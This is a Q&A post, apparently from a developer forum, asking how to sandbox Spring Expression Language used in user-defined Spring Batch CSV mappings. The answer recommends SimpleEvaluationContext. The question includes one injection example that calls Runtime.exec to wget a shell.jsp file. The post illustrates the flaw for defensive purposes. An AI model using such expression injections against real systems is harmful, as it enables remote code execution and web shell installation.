I am using Spring-EL to create dynamic csv-field to class-field mappings used in different Spring-Batch import jobs. (Different input files, same output classes). This is working very good but the idea is that it must be possible for a user to create such a mapping configuration.
The problem is that the Spring-EL expressions are not executed inside a kind of sandbox and therefor it is very easy to inject evil code. For example:
name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")
My question is, how can I run Spring-EL inside some kind of sandbox or restrict access to only a specific set of methods/classes? I cannot find any thing related to this topic. Are maybe Spring-EL is not the right choice for the job.
Example of what I try to achieve:
name: column[0]
category: concat(' ', column[18], column[19])
age: split(column[3], '/', 0)
The SimpleEvaluationContext has been designed to decrease application vulnerabilities.
See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:
SimpleEvaluationContextis designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, thecreate()static factory method enables only read access to properties.
EDIT: Note as the OP commented to his own question, this can be used to allow instance methods to be called by doing the following:
SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();